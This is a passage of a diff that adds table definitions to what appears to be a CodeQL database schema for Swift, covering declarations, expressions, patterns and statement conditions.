@protocol_decl_or_none ref +); + +if_config_decls( //dir=decl + unique int id: @if_config_decl +); + +#keyset[id, index] +if_config_decl_active_elements( //dir=decl + int id: @if_config_decl ref, + int index: int ref, + int active_element: @ast_node_or_none ref +); + +import_decls( //dir=decl + unique int id: @import_decl +); + +#keyset[id] +import_decl_is_exported( //dir=decl + int id: @import_decl ref +); + +#keyset[id] +import_decl_imported_modules( //dir=decl + int id: @import_decl ref, + int imported_module: @module_decl_or_none ref +); + +#keyset[id, index] +import_decl_declarations( //dir=decl + int id: @import_decl ref, + int index: int ref, + int declaration: @value_decl_or_none ref +); + +missing_member_decls( //dir=decl + unique int id: @missing_member_decl, + string name: string ref +); + +@operator_decl = + @infix_operator_decl +| @postfix_operator_decl +| @prefix_operator_decl +; + +#keyset[id] +operator_decls( //dir=decl + int id: @operator_decl ref, + string name: string ref +); + +pattern_binding_decls( //dir=decl + unique int id: @pattern_binding_decl +); + +#keyset[id, index] +pattern_binding_decl_inits( //dir=decl + int id: @pattern_binding_decl ref, + int index: int ref, + int init: @expr_or_none ref +); + +#keyset[id, index] +pattern_binding_decl_patterns( //dir=decl + int id: @pattern_binding_decl ref, + int index: int ref, + int pattern: @pattern_or_none ref +); + +pound_diagnostic_decls( //dir=decl + unique int id: @pound_diagnostic_decl, + int kind: int ref, + int message: @string_literal_expr_or_none ref +); + +precedence_group_decls( //dir=decl + unique int id: @precedence_group_decl +); + +top_level_code_decls( //dir=decl + unique int id: @top_level_code_decl, + int body: @brace_stmt_or_none ref +); + +@value_decl = + @abstract_storage_decl +| @enum_element_decl +| @function +| @macro_decl +| @type_decl +; + +#keyset[id] +value_decls( //dir=decl + int id: @value_decl ref, + int interface_type: @type_or_none ref +); + 
+@abstract_storage_decl = + @subscript_decl +| @var_decl +; + +#keyset[id, index] +abstract_storage_decl_accessors( //dir=decl + int id: @abstract_storage_decl ref, + int index: int ref, + int accessor: @accessor_or_none ref +); + +enum_element_decls( //dir=decl + unique int id: @enum_element_decl, + string name: string ref +); + +#keyset[id, index] +enum_element_decl_params( //dir=decl + int id: @enum_element_decl ref, + int index: int ref, + int param: @param_decl_or_none ref +); + +@function = + @accessor_or_named_function +| @deinitializer +| @initializer +; + +infix_operator_decls( //dir=decl + unique int id: @infix_operator_decl +); + +#keyset[id] +infix_operator_decl_precedence_groups( //dir=decl + int id: @infix_operator_decl ref, + int precedence_group: @precedence_group_decl_or_none ref +); + +macro_decls( //dir=decl + unique int id: @macro_decl, + string name: string ref +); + +#keyset[id, index] +macro_decl_parameters( //dir=decl + int id: @macro_decl ref, + int index: int ref, + int parameter: @param_decl_or_none ref +); + +#keyset[id, index] +macro_decl_roles( //dir=decl + int id: @macro_decl ref, + int index: int ref, + int role: @macro_role_or_none ref +); + +postfix_operator_decls( //dir=decl + unique int id: @postfix_operator_decl +); + +prefix_operator_decls( //dir=decl + unique int id: @prefix_operator_decl +); + +@type_decl = + @abstract_type_param_decl +| @generic_type_decl +| @module_decl +; + +#keyset[id] +type_decls( //dir=decl + int id: @type_decl ref, + string name: string ref +); + +#keyset[id, index] +type_decl_inherited_types( //dir=decl + int id: @type_decl ref, + int index: int ref, + int inherited_type: @type_or_none ref +); + +@abstract_type_param_decl = + @associated_type_decl +| @generic_type_param_decl +; + +@accessor_or_named_function = + @accessor +| @named_function +; + +deinitializers( //dir=decl + unique int id: @deinitializer +); + +@generic_type_decl = + @nominal_type_decl +| @opaque_type_decl +| @type_alias_decl +; + 
+initializers( //dir=decl + unique int id: @initializer +); + +module_decls( //dir=decl + unique int id: @module_decl +); + +#keyset[id] +module_decl_is_builtin_module( //dir=decl + int id: @module_decl ref +); + +#keyset[id] +module_decl_is_system_module( //dir=decl + int id: @module_decl ref +); + +module_decl_imported_modules( //dir=decl + int id: @module_decl ref, + int imported_module: @module_decl_or_none ref +); + +module_decl_exported_modules( //dir=decl + int id: @module_decl ref, + int exported_module: @module_decl_or_none ref +); + +subscript_decls( //dir=decl + unique int id: @subscript_decl, + int element_type: @type_or_none ref +); + +#keyset[id, index] +subscript_decl_params( //dir=decl + int id: @subscript_decl ref, + int index: int ref, + int param: @param_decl_or_none ref +); + +@var_decl = + @concrete_var_decl +| @param_decl +; + +#keyset[id] +var_decls( //dir=decl + int id: @var_decl ref, + string name: string ref, + int type_: @type_or_none ref +); + +#keyset[id] +var_decl_attached_property_wrapper_types( //dir=decl + int id: @var_decl ref, + int attached_property_wrapper_type: @type_or_none ref +); + +#keyset[id] +var_decl_parent_patterns( //dir=decl + int id: @var_decl ref, + int parent_pattern: @pattern_or_none ref +); + +#keyset[id] +var_decl_parent_initializers( //dir=decl + int id: @var_decl ref, + int parent_initializer: @expr_or_none ref +); + +#keyset[id] +var_decl_property_wrapper_backing_var_bindings( //dir=decl + int id: @var_decl ref, + int property_wrapper_backing_var_binding: @pattern_binding_decl_or_none ref +); + +#keyset[id] +var_decl_property_wrapper_backing_vars( //dir=decl + int id: @var_decl ref, + int property_wrapper_backing_var: @var_decl_or_none ref +); + +#keyset[id] +var_decl_property_wrapper_projection_var_bindings( //dir=decl + int id: @var_decl ref, + int property_wrapper_projection_var_binding: @pattern_binding_decl_or_none ref +); + +#keyset[id] +var_decl_property_wrapper_projection_vars( //dir=decl + int id: 
@var_decl ref, + int property_wrapper_projection_var: @var_decl_or_none ref +); + +accessors( //dir=decl + unique int id: @accessor +); + +#keyset[id] +accessor_is_getter( //dir=decl + int id: @accessor ref +); + +#keyset[id] +accessor_is_setter( //dir=decl + int id: @accessor ref +); + +#keyset[id] +accessor_is_will_set( //dir=decl + int id: @accessor ref +); + +#keyset[id] +accessor_is_did_set( //dir=decl + int id: @accessor ref +); + +#keyset[id] +accessor_is_read( //dir=decl + int id: @accessor ref +); + +#keyset[id] +accessor_is_modify( //dir=decl + int id: @accessor ref +); + +#keyset[id] +accessor_is_unsafe_address( //dir=decl + int id: @accessor ref +); + +#keyset[id] +accessor_is_unsafe_mutable_address( //dir=decl + int id: @accessor ref +); + +associated_type_decls( //dir=decl + unique int id: @associated_type_decl +); + +concrete_var_decls( //dir=decl + unique int id: @concrete_var_decl, + int introducer_int: int ref +); + +generic_type_param_decls( //dir=decl + unique int id: @generic_type_param_decl +); + +named_functions( //dir=decl + unique int id: @named_function +); + +@nominal_type_decl = + @class_decl +| @enum_decl +| @protocol_decl +| @struct_decl +; + +#keyset[id] +nominal_type_decls( //dir=decl + int id: @nominal_type_decl ref, + int type_: @type_or_none ref +); + +opaque_type_decls( //dir=decl + unique int id: @opaque_type_decl, + int naming_declaration: @value_decl_or_none ref +); + +#keyset[id, index] +opaque_type_decl_opaque_generic_params( //dir=decl + int id: @opaque_type_decl ref, + int index: int ref, + int opaque_generic_param: @generic_type_param_type_or_none ref +); + +param_decls( //dir=decl + unique int id: @param_decl +); + +#keyset[id] +param_decl_is_inout( //dir=decl + int id: @param_decl ref +); + +#keyset[id] +param_decl_property_wrapper_local_wrapped_var_bindings( //dir=decl + int id: @param_decl ref, + int property_wrapper_local_wrapped_var_binding: @pattern_binding_decl_or_none ref +); + +#keyset[id] 
+param_decl_property_wrapper_local_wrapped_vars( //dir=decl + int id: @param_decl ref, + int property_wrapper_local_wrapped_var: @var_decl_or_none ref +); + +type_alias_decls( //dir=decl + unique int id: @type_alias_decl, + int aliased_type: @type_or_none ref +); + +class_decls( //dir=decl + unique int id: @class_decl +); + +enum_decls( //dir=decl + unique int id: @enum_decl +); + +protocol_decls( //dir=decl + unique int id: @protocol_decl +); + +struct_decls( //dir=decl + unique int id: @struct_decl +); + +arguments( //dir=expr + unique int id: @argument, + string label: string ref, + int expr: @expr_or_none ref +); + +@expr = + @any_try_expr +| @applied_property_wrapper_expr +| @apply_expr +| @assign_expr +| @bind_optional_expr +| @capture_list_expr +| @closure_expr +| @collection_expr +| @consume_expr +| @copy_expr +| @decl_ref_expr +| @default_argument_expr +| @discard_assignment_expr +| @dot_syntax_base_ignored_expr +| @dynamic_type_expr +| @enum_is_case_expr +| @error_expr +| @explicit_cast_expr +| @force_value_expr +| @identity_expr +| @if_expr +| @implicit_conversion_expr +| @in_out_expr +| @key_path_application_expr +| @key_path_dot_expr +| @key_path_expr +| @lazy_initialization_expr +| @literal_expr +| @lookup_expr +| @make_temporarily_escapable_expr +| @materialize_pack_expr +| @obj_c_selector_expr +| @one_way_expr +| @opaque_value_expr +| @open_existential_expr +| @optional_evaluation_expr +| @other_initializer_ref_expr +| @overloaded_decl_ref_expr +| @pack_element_expr +| @pack_expansion_expr +| @property_wrapper_value_placeholder_expr +| @rebind_self_in_initializer_expr +| @sequence_expr +| @single_value_stmt_expr +| @super_ref_expr +| @tap_expr +| @tuple_element_expr +| @tuple_expr +| @type_expr +| @unresolved_decl_ref_expr +| @unresolved_dot_expr +| @unresolved_member_expr +| @unresolved_pattern_expr +| @unresolved_specialize_expr +| @vararg_expansion_expr +; + +#keyset[id] +expr_types( //dir=expr + int id: @expr ref, + int type_: @type_or_none ref 
+); + +@any_try_expr = + @force_try_expr +| @optional_try_expr +| @try_expr +; + +#keyset[id] +any_try_exprs( //dir=expr + int id: @any_try_expr ref, + int sub_expr: @expr_or_none ref +); + +applied_property_wrapper_exprs( //dir=expr + unique int id: @applied_property_wrapper_expr, + int kind: int ref, + int value: @expr_or_none ref, + int param: @param_decl_or_none ref +); + +@apply_expr = + @binary_expr +| @call_expr +| @postfix_unary_expr +| @prefix_unary_expr +| @self_apply_expr +; + +#keyset[id] +apply_exprs( //dir=expr + int id: @apply_expr ref, + int function: @expr_or_none ref +); + +#keyset[id, index] +apply_expr_arguments( //dir=expr + int id: @apply_expr ref, + int index: int ref, + int argument: @argument_or_none ref +); + +assign_exprs( //dir=expr + unique int id: @assign_expr, + int dest: @expr_or_none ref, + int source: @expr_or_none ref +); + +bind_optional_exprs( //dir=expr + unique int id: @bind_optional_expr, + int sub_expr: @expr_or_none ref +); + +capture_list_exprs( //dir=expr + unique int id: @capture_list_expr, + int closure_body: @closure_expr_or_none ref +); + +#keyset[id, index] +capture_list_expr_binding_decls( //dir=expr + int id: @capture_list_expr ref, + int index: int ref, + int binding_decl: @pattern_binding_decl_or_none ref +); + +@closure_expr = + @auto_closure_expr +| @explicit_closure_expr +; + +@collection_expr = + @array_expr +| @dictionary_expr +; + +consume_exprs( //dir=expr + unique int id: @consume_expr, + int sub_expr: @expr_or_none ref +); + +copy_exprs( //dir=expr + unique int id: @copy_expr, + int sub_expr: @expr_or_none ref +); + +decl_ref_exprs( //dir=expr + unique int id: @decl_ref_expr, + int decl: @decl_or_none ref +); + +#keyset[id, index] +decl_ref_expr_replacement_types( //dir=expr + int id: @decl_ref_expr ref, + int index: int ref, + int replacement_type: @type_or_none ref +); + +#keyset[id] +decl_ref_expr_has_direct_to_storage_semantics( //dir=expr + int id: @decl_ref_expr ref +); + +#keyset[id] 
+decl_ref_expr_has_direct_to_implementation_semantics( //dir=expr + int id: @decl_ref_expr ref +); + +#keyset[id] +decl_ref_expr_has_ordinary_semantics( //dir=expr + int id: @decl_ref_expr ref +); + +#keyset[id] +decl_ref_expr_has_distributed_thunk_semantics( //dir=expr + int id: @decl_ref_expr ref +); + +default_argument_exprs( //dir=expr + unique int id: @default_argument_expr, + int param_decl: @param_decl_or_none ref, + int param_index: int ref +); + +#keyset[id] +default_argument_expr_caller_side_defaults( //dir=expr + int id: @default_argument_expr ref, + int caller_side_default: @expr_or_none ref +); + +discard_assignment_exprs( //dir=expr + unique int id: @discard_assignment_expr +); + +dot_syntax_base_ignored_exprs( //dir=expr + unique int id: @dot_syntax_base_ignored_expr, + int qualifier: @expr_or_none ref, + int sub_expr: @expr_or_none ref +); + +dynamic_type_exprs( //dir=expr + unique int id: @dynamic_type_expr, + int base: @expr_or_none ref +); + +enum_is_case_exprs( //dir=expr + unique int id: @enum_is_case_expr, + int sub_expr: @expr_or_none ref, + int element: @enum_element_decl_or_none ref +); + +error_exprs( //dir=expr + unique int id: @error_expr +); + +@explicit_cast_expr = + @checked_cast_expr +| @coerce_expr +; + +#keyset[id] +explicit_cast_exprs( //dir=expr + int id: @explicit_cast_expr ref, + int sub_expr: @expr_or_none ref +); + +force_value_exprs( //dir=expr + unique int id: @force_value_expr, + int sub_expr: @expr_or_none ref +); + +@identity_expr = + @await_expr +| @borrow_expr +| @dot_self_expr +| @paren_expr +| @unresolved_member_chain_result_expr +; + +#keyset[id] +identity_exprs( //dir=expr + int id: @identity_expr ref, + int sub_expr: @expr_or_none ref +); + +if_exprs( //dir=expr + unique int id: @if_expr, + int condition: @expr_or_none ref, + int then_expr: @expr_or_none ref, + int else_expr: @expr_or_none ref +); + +@implicit_conversion_expr = + @abi_safe_conversion_expr +| @any_hashable_erasure_expr +| @archetype_to_super_expr 
+| @array_to_pointer_expr +| @bridge_from_obj_c_expr +| @bridge_to_obj_c_expr +| @class_metatype_to_object_expr +| @collection_upcast_conversion_expr +| @conditional_bridge_from_obj_c_expr +| @covariant_function_conversion_expr +| @covariant_return_conversion_expr +| @derived_to_base_expr +| @destructure_tuple_expr +| @differentiable_function_expr +| @differentiable_function_extract_original_expr +| @erasure_expr +| @existential_metatype_to_object_expr +| @foreign_object_conversion_expr +| @function_conversion_expr +| @in_out_to_pointer_expr +| @inject_into_optional_expr +| @linear_function_expr +| @linear_function_extract_original_expr +| @linear_to_differentiable_function_expr +| @load_expr +| @metatype_conversion_expr +| @pointer_to_pointer_expr +| @protocol_metatype_to_object_expr +| @string_to_pointer_expr +| @underlying_to_opaque_expr +| @unevaluated_instance_expr +| @unresolved_type_conversion_expr +; + +#keyset[id] +implicit_conversion_exprs( //dir=expr + int id: @implicit_conversion_expr ref, + int sub_expr: @expr_or_none ref +); + +in_out_exprs( //dir=expr + unique int id: @in_out_expr, + int sub_expr: @expr_or_none ref +); + +key_path_application_exprs( //dir=expr + unique int id: @key_path_application_expr, + int base: @expr_or_none ref, + int key_path: @expr_or_none ref +); + +key_path_dot_exprs( //dir=expr + unique int id: @key_path_dot_expr +); + +key_path_exprs( //dir=expr + unique int id: @key_path_expr +); + +#keyset[id] +key_path_expr_roots( //dir=expr + int id: @key_path_expr ref, + int root: @type_repr_or_none ref +); + +#keyset[id, index] +key_path_expr_components( //dir=expr + int id: @key_path_expr ref, + int index: int ref, + int component: @key_path_component_or_none ref +); + +lazy_initialization_exprs( //dir=expr + unique int id: @lazy_initialization_expr, + int sub_expr: @expr_or_none ref +); + +@literal_expr = + @builtin_literal_expr +| @interpolated_string_literal_expr +| @nil_literal_expr +| @object_literal_expr +| 
@regex_literal_expr +; + +@lookup_expr = + @dynamic_lookup_expr +| @member_ref_expr +| @subscript_expr +; + +#keyset[id] +lookup_exprs( //dir=expr + int id: @lookup_expr ref, + int base: @expr_or_none ref +); + +#keyset[id] +lookup_expr_members( //dir=expr + int id: @lookup_expr ref, + int member: @decl_or_none ref +); + +make_temporarily_escapable_exprs( //dir=expr + unique int id: @make_temporarily_escapable_expr, + int escaping_closure: @opaque_value_expr_or_none ref, + int nonescaping_closure: @expr_or_none ref, + int sub_expr: @expr_or_none ref +); + +materialize_pack_exprs( //dir=expr + unique int id: @materialize_pack_expr, + int sub_expr: @expr_or_none ref +); + +obj_c_selector_exprs( //dir=expr + unique int id: @obj_c_selector_expr, + int sub_expr: @expr_or_none ref, + int method: @function_or_none ref +); + +one_way_exprs( //dir=expr + unique int id: @one_way_expr, + int sub_expr: @expr_or_none ref +); + +opaque_value_exprs( //dir=expr + unique int id: @opaque_value_expr +); + +open_existential_exprs( //dir=expr + unique int id: @open_existential_expr, + int sub_expr: @expr_or_none ref, + int existential: @expr_or_none ref, + int opaque_expr: @opaque_value_expr_or_none ref +); + +optional_evaluation_exprs( //dir=expr + unique int id: @optional_evaluation_expr, + int sub_expr: @expr_or_none ref +); + +other_initializer_ref_exprs( //dir=expr + unique int id: @other_initializer_ref_expr, + int initializer: @initializer_or_none ref +); + +overloaded_decl_ref_exprs( //dir=expr + unique int id: @overloaded_decl_ref_expr +); + +#keyset[id, index] +overloaded_decl_ref_expr_possible_declarations( //dir=expr + int id: @overloaded_decl_ref_expr ref, + int index: int ref, + int possible_declaration: @value_decl_or_none ref +); + +pack_element_exprs( //dir=expr + unique int id: @pack_element_expr, + int sub_expr: @expr_or_none ref +); + +pack_expansion_exprs( //dir=expr + unique int id: @pack_expansion_expr, + int pattern_expr: @expr_or_none ref +); + 
+property_wrapper_value_placeholder_exprs( //dir=expr + unique int id: @property_wrapper_value_placeholder_expr, + int placeholder: @opaque_value_expr_or_none ref +); + +#keyset[id] +property_wrapper_value_placeholder_expr_wrapped_values( //dir=expr + int id: @property_wrapper_value_placeholder_expr ref, + int wrapped_value: @expr_or_none ref +); + +rebind_self_in_initializer_exprs( //dir=expr + unique int id: @rebind_self_in_initializer_expr, + int sub_expr: @expr_or_none ref, + int self: @var_decl_or_none ref +); + +sequence_exprs( //dir=expr + unique int id: @sequence_expr +); + +#keyset[id, index] +sequence_expr_elements( //dir=expr + int id: @sequence_expr ref, + int index: int ref, + int element: @expr_or_none ref +); + +single_value_stmt_exprs( //dir=expr + unique int id: @single_value_stmt_expr, + int stmt: @stmt_or_none ref +); + +super_ref_exprs( //dir=expr + unique int id: @super_ref_expr, + int self: @var_decl_or_none ref +); + +tap_exprs( //dir=expr + unique int id: @tap_expr, + int body: @brace_stmt_or_none ref, + int var: @var_decl_or_none ref +); + +#keyset[id] +tap_expr_sub_exprs( //dir=expr + int id: @tap_expr ref, + int sub_expr: @expr_or_none ref +); + +tuple_element_exprs( //dir=expr + unique int id: @tuple_element_expr, + int sub_expr: @expr_or_none ref, + int index: int ref +); + +tuple_exprs( //dir=expr + unique int id: @tuple_expr +); + +#keyset[id, index] +tuple_expr_elements( //dir=expr + int id: @tuple_expr ref, + int index: int ref, + int element: @expr_or_none ref +); + +type_exprs( //dir=expr + unique int id: @type_expr +); + +#keyset[id] +type_expr_type_reprs( //dir=expr + int id: @type_expr ref, + int type_repr: @type_repr_or_none ref +); + +unresolved_decl_ref_exprs( //dir=expr + unique int id: @unresolved_decl_ref_expr +); + +#keyset[id] +unresolved_decl_ref_expr_names( //dir=expr + int id: @unresolved_decl_ref_expr ref, + string name: string ref +); + +unresolved_dot_exprs( //dir=expr + unique int id: @unresolved_dot_expr, + int 
base: @expr_or_none ref, + string name: string ref +); + +unresolved_member_exprs( //dir=expr + unique int id: @unresolved_member_expr, + string name: string ref +); + +unresolved_pattern_exprs( //dir=expr + unique int id: @unresolved_pattern_expr, + int sub_pattern: @pattern_or_none ref +); + +unresolved_specialize_exprs( //dir=expr + unique int id: @unresolved_specialize_expr, + int sub_expr: @expr_or_none ref +); + +vararg_expansion_exprs( //dir=expr + unique int id: @vararg_expansion_expr, + int sub_expr: @expr_or_none ref +); + +abi_safe_conversion_exprs( //dir=expr + unique int id: @abi_safe_conversion_expr +); + +any_hashable_erasure_exprs( //dir=expr + unique int id: @any_hashable_erasure_expr +); + +archetype_to_super_exprs( //dir=expr + unique int id: @archetype_to_super_expr +); + +array_exprs( //dir=expr + unique int id: @array_expr +); + +#keyset[id, index] +array_expr_elements( //dir=expr + int id: @array_expr ref, + int index: int ref, + int element: @expr_or_none ref +); + +array_to_pointer_exprs( //dir=expr + unique int id: @array_to_pointer_expr +); + +auto_closure_exprs( //dir=expr + unique int id: @auto_closure_expr +); + +await_exprs( //dir=expr + unique int id: @await_expr +); + +binary_exprs( //dir=expr + unique int id: @binary_expr +); + +borrow_exprs( //dir=expr + unique int id: @borrow_expr +); + +bridge_from_obj_c_exprs( //dir=expr + unique int id: @bridge_from_obj_c_expr +); + +bridge_to_obj_c_exprs( //dir=expr + unique int id: @bridge_to_obj_c_expr +); + +@builtin_literal_expr = + @boolean_literal_expr +| @magic_identifier_literal_expr +| @number_literal_expr +| @string_literal_expr +; + +call_exprs( //dir=expr + unique int id: @call_expr +); + +@checked_cast_expr = + @conditional_checked_cast_expr +| @forced_checked_cast_expr +| @is_expr +; + +class_metatype_to_object_exprs( //dir=expr + unique int id: @class_metatype_to_object_expr +); + +coerce_exprs( //dir=expr + unique int id: @coerce_expr +); + +collection_upcast_conversion_exprs( 
//dir=expr + unique int id: @collection_upcast_conversion_expr +); + +conditional_bridge_from_obj_c_exprs( //dir=expr + unique int id: @conditional_bridge_from_obj_c_expr +); + +covariant_function_conversion_exprs( //dir=expr + unique int id: @covariant_function_conversion_expr +); + +covariant_return_conversion_exprs( //dir=expr + unique int id: @covariant_return_conversion_expr +); + +derived_to_base_exprs( //dir=expr + unique int id: @derived_to_base_expr +); + +destructure_tuple_exprs( //dir=expr + unique int id: @destructure_tuple_expr +); + +dictionary_exprs( //dir=expr + unique int id: @dictionary_expr +); + +#keyset[id, index] +dictionary_expr_elements( //dir=expr + int id: @dictionary_expr ref, + int index: int ref, + int element: @expr_or_none ref +); + +differentiable_function_exprs( //dir=expr + unique int id: @differentiable_function_expr +); + +differentiable_function_extract_original_exprs( //dir=expr + unique int id: @differentiable_function_extract_original_expr +); + +dot_self_exprs( //dir=expr + unique int id: @dot_self_expr +); + +@dynamic_lookup_expr = + @dynamic_member_ref_expr +| @dynamic_subscript_expr +; + +erasure_exprs( //dir=expr + unique int id: @erasure_expr +); + +existential_metatype_to_object_exprs( //dir=expr + unique int id: @existential_metatype_to_object_expr +); + +explicit_closure_exprs( //dir=expr + unique int id: @explicit_closure_expr +); + +force_try_exprs( //dir=expr + unique int id: @force_try_expr +); + +foreign_object_conversion_exprs( //dir=expr + unique int id: @foreign_object_conversion_expr +); + +function_conversion_exprs( //dir=expr + unique int id: @function_conversion_expr +); + +in_out_to_pointer_exprs( //dir=expr + unique int id: @in_out_to_pointer_expr +); + +inject_into_optional_exprs( //dir=expr + unique int id: @inject_into_optional_expr +); + +interpolated_string_literal_exprs( //dir=expr + unique int id: @interpolated_string_literal_expr +); + +#keyset[id] 
+interpolated_string_literal_expr_interpolation_exprs( //dir=expr + int id: @interpolated_string_literal_expr ref, + int interpolation_expr: @opaque_value_expr_or_none ref +); + +#keyset[id] +interpolated_string_literal_expr_appending_exprs( //dir=expr + int id: @interpolated_string_literal_expr ref, + int appending_expr: @tap_expr_or_none ref +); + +linear_function_exprs( //dir=expr + unique int id: @linear_function_expr +); + +linear_function_extract_original_exprs( //dir=expr + unique int id: @linear_function_extract_original_expr +); + +linear_to_differentiable_function_exprs( //dir=expr + unique int id: @linear_to_differentiable_function_expr +); + +load_exprs( //dir=expr + unique int id: @load_expr +); + +member_ref_exprs( //dir=expr + unique int id: @member_ref_expr +); + +#keyset[id] +member_ref_expr_has_direct_to_storage_semantics( //dir=expr + int id: @member_ref_expr ref +); + +#keyset[id] +member_ref_expr_has_direct_to_implementation_semantics( //dir=expr + int id: @member_ref_expr ref +); + +#keyset[id] +member_ref_expr_has_ordinary_semantics( //dir=expr + int id: @member_ref_expr ref +); + +#keyset[id] +member_ref_expr_has_distributed_thunk_semantics( //dir=expr + int id: @member_ref_expr ref +); + +metatype_conversion_exprs( //dir=expr + unique int id: @metatype_conversion_expr +); + +nil_literal_exprs( //dir=expr + unique int id: @nil_literal_expr +); + +object_literal_exprs( //dir=expr + unique int id: @object_literal_expr, + int kind: int ref +); + +#keyset[id, index] +object_literal_expr_arguments( //dir=expr + int id: @object_literal_expr ref, + int index: int ref, + int argument: @argument_or_none ref +); + +optional_try_exprs( //dir=expr + unique int id: @optional_try_expr +); + +paren_exprs( //dir=expr + unique int id: @paren_expr +); + +pointer_to_pointer_exprs( //dir=expr + unique int id: @pointer_to_pointer_expr +); + +postfix_unary_exprs( //dir=expr + unique int id: @postfix_unary_expr +); + +prefix_unary_exprs( //dir=expr + unique int 
id: @prefix_unary_expr +); + +protocol_metatype_to_object_exprs( //dir=expr + unique int id: @protocol_metatype_to_object_expr +); + +regex_literal_exprs( //dir=expr + unique int id: @regex_literal_expr, + string pattern: string ref, + int version: int ref +); + +@self_apply_expr = + @dot_syntax_call_expr +| @initializer_ref_call_expr +; + +#keyset[id] +self_apply_exprs( //dir=expr + int id: @self_apply_expr ref, + int base: @expr_or_none ref +); + +string_to_pointer_exprs( //dir=expr + unique int id: @string_to_pointer_expr +); + +subscript_exprs( //dir=expr + unique int id: @subscript_expr +); + +#keyset[id, index] +subscript_expr_arguments( //dir=expr + int id: @subscript_expr ref, + int index: int ref, + int argument: @argument_or_none ref +); + +#keyset[id] +subscript_expr_has_direct_to_storage_semantics( //dir=expr + int id: @subscript_expr ref +); + +#keyset[id] +subscript_expr_has_direct_to_implementation_semantics( //dir=expr + int id: @subscript_expr ref +); + +#keyset[id] +subscript_expr_has_ordinary_semantics( //dir=expr + int id: @subscript_expr ref +); + +#keyset[id] +subscript_expr_has_distributed_thunk_semantics( //dir=expr + int id: @subscript_expr ref +); + +try_exprs( //dir=expr + unique int id: @try_expr +); + +underlying_to_opaque_exprs( //dir=expr + unique int id: @underlying_to_opaque_expr +); + +unevaluated_instance_exprs( //dir=expr + unique int id: @unevaluated_instance_expr +); + +unresolved_member_chain_result_exprs( //dir=expr + unique int id: @unresolved_member_chain_result_expr +); + +unresolved_type_conversion_exprs( //dir=expr + unique int id: @unresolved_type_conversion_expr +); + +boolean_literal_exprs( //dir=expr + unique int id: @boolean_literal_expr, + boolean value: boolean ref +); + +conditional_checked_cast_exprs( //dir=expr + unique int id: @conditional_checked_cast_expr +); + +dot_syntax_call_exprs( //dir=expr + unique int id: @dot_syntax_call_expr +); + +dynamic_member_ref_exprs( //dir=expr + unique int id: 
@dynamic_member_ref_expr +); + +dynamic_subscript_exprs( //dir=expr + unique int id: @dynamic_subscript_expr +); + +forced_checked_cast_exprs( //dir=expr + unique int id: @forced_checked_cast_expr +); + +initializer_ref_call_exprs( //dir=expr + unique int id: @initializer_ref_call_expr +); + +is_exprs( //dir=expr + unique int id: @is_expr +); + +magic_identifier_literal_exprs( //dir=expr + unique int id: @magic_identifier_literal_expr, + string kind: string ref +); + +@number_literal_expr = + @float_literal_expr +| @integer_literal_expr +; + +string_literal_exprs( //dir=expr + unique int id: @string_literal_expr, + string value: string ref +); + +float_literal_exprs( //dir=expr + unique int id: @float_literal_expr, + string string_value: string ref +); + +integer_literal_exprs( //dir=expr + unique int id: @integer_literal_expr, + string string_value: string ref +); + +@pattern = + @any_pattern +| @binding_pattern +| @bool_pattern +| @enum_element_pattern +| @expr_pattern +| @is_pattern +| @named_pattern +| @optional_some_pattern +| @paren_pattern +| @tuple_pattern +| @typed_pattern +; + +#keyset[id] +pattern_types( //dir=pattern + int id: @pattern ref, + int type_: @type_or_none ref +); + +any_patterns( //dir=pattern + unique int id: @any_pattern +); + +binding_patterns( //dir=pattern + unique int id: @binding_pattern, + int sub_pattern: @pattern_or_none ref +); + +bool_patterns( //dir=pattern + unique int id: @bool_pattern, + boolean value: boolean ref +); + +enum_element_patterns( //dir=pattern + unique int id: @enum_element_pattern, + int element: @enum_element_decl_or_none ref +); + +#keyset[id] +enum_element_pattern_sub_patterns( //dir=pattern + int id: @enum_element_pattern ref, + int sub_pattern: @pattern_or_none ref +); + +expr_patterns( //dir=pattern + unique int id: @expr_pattern, + int sub_expr: @expr_or_none ref +); + +is_patterns( //dir=pattern + unique int id: @is_pattern +); + +#keyset[id] +is_pattern_cast_type_reprs( //dir=pattern + int id: 
@is_pattern ref, + int cast_type_repr: @type_repr_or_none ref +); + +#keyset[id] +is_pattern_sub_patterns( //dir=pattern + int id: @is_pattern ref, + int sub_pattern: @pattern_or_none ref +); + +named_patterns( //dir=pattern + unique int id: @named_pattern, + int var_decl: @var_decl_or_none ref +); + +optional_some_patterns( //dir=pattern + unique int id: @optional_some_pattern, + int sub_pattern: @pattern_or_none ref +); + +paren_patterns( //dir=pattern + unique int id: @paren_pattern, + int sub_pattern: @pattern_or_none ref +); + +tuple_patterns( //dir=pattern + unique int id: @tuple_pattern +); + +#keyset[id, index] +tuple_pattern_elements( //dir=pattern + int id: @tuple_pattern ref, + int index: int ref, + int element: @pattern_or_none ref +); + +typed_patterns( //dir=pattern + unique int id: @typed_pattern, + int sub_pattern: @pattern_or_none ref +); + +#keyset[id] +typed_pattern_type_reprs( //dir=pattern + int id: @typed_pattern ref, + int type_repr: @type_repr_or_none ref +); + +case_label_items( //dir=stmt + unique int id: @case_label_item, + int pattern: @pattern_or_none ref +); + +#keyset[id] +case_label_item_guards( //dir=stmt + int id: @case_label_item ref, + int guard: @expr_or_none ref +); + +condition_elements( //dir=stmt + unique int id: @condition_element +); + +#keyset[id] +condition_element_booleans( //dir=stmt + int id: @condition_element ref, + int boolean_: @expr_or_none ref +); + +#keyset[id] +condition_element_patterns( //dir=stmt + int id: @condition_element ref, + int pattern: @pattern_or_none ref +); + +#keyset[id] +condition_element_initializers( //dir=stmt + int id: @condition_element ref, + int initializer: @expr_or_none ref +); + +#keyset[id] +condition_element_availabilities( //dir=stmt + int id: @condition_element ref, + int availability: @availability_info_or_none ref +); + +@stmt = + @brace_stmt +| @break_stmt +| @case_stmt +| @continue_stmt +| @defer_stmt +| @discard_stmt +| @fail_stmt +| @fallthrough_stmt +| @labeled_stmt +| 
